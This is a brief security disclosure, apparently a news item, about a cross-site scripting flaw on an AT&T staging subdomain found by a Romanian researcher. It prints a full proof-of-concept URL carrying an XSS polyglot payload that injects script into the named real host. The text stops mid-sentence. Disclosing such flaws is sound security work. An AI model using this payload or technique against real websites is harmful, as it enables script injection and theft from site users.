An XSS vulnerability was found in the AT&T website by Sony from the [in]Security.Ro Romania Team. One of AT&T's subdomains, http://admin.stage.att.net, is vulnerable to XSS attacks.
POC:
http://admin.stage.att.net/bellsouth/s/s.dll?spage=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%22%3E
He also found an XSS vulnerability in a third-party Facebook application. In the past, he discovered XSS vulnerabilities in a lot of high-profile sites;